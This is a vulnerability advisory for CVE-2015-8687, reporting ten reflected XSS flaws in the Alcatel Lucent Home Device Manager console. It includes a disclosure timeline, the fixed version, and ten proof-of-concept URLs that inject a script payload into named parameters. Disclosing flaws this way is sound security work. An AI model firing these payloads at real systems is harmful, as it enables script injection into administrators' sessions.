Document Title: =============== Alcatel Lucent Home Device Manager - Management Console Multiple XSS CVE-Number: =========== CVE-2015-8687 Release Date: ============= 03 Jan 2016 Abstract Advisory Information: ============================= Ugur Cihan Koc discovered ten Reflected XSS vulnerabilities Alcatel Lucent Home Device Manager - Management Console Vulnerability Disclosure Timeline: ================================== 10 Dec 2015 Bug reported to the vendor. 10 Dec 2015 Vendor returned ; investigating 16 Dec 2015 Vendor has validated the issues & fixed 27 Dec 2015 CVE number assigned 03 Jan 2016 Disclosured Affected Product(s): ==================== Alcatel Lucent Home Device Manager - Management Console 4.1.10.5 may be old version could be affected Exploitation Technique: ======================= Local, Authenticated Severity Level: =============== High Technical Details & Description: ================================ ? Sample Payload : 42f8b36<script>alert(1)<%2fscript>152b4 ? Affected Path/Parameter: [10 parameter] 1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter] o http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36 <script>alert(1)<%2fscript>152b4 2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter] o http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31 "><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0 3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter] o http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3 "><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0 4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter] o http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b <script>alert(1)<%2fscript>1a032 5. /hdm/ajax.do [operation parameter] o http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81 <script>alert(1)<%2fscript>238957ca4e0&deviceId=8001 6. /hdm/device/editDevice.do [deviceID parameter] o http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5 <script>alert(1)<%2fscript>45f4a 7. /hdm/policy/findPolicies.do [policyAction parameter] o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01 "><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all 8. /hdm/policy/findPolicies.do [policyClass parameter] o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb "><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all 9. /hdm/policy/findPolicies.do [policyName parameter] o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd "><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all 10. /hdm/xmlHttp.do [operation parameter] o http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c <script>alert(1)<%2fscript>217f045ae1f&deviceID=8001 Proof of Concept (PoC): ======================= POC Video; https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing Solution Fix & Patch: ==================== Fixed version of 4.2 Security Risk: ============== The risk of the vulnerability above estimated as high. Credits & Authors: ================== Ugur Cihan Koc(@_uceka_) Blog: www.uceka.com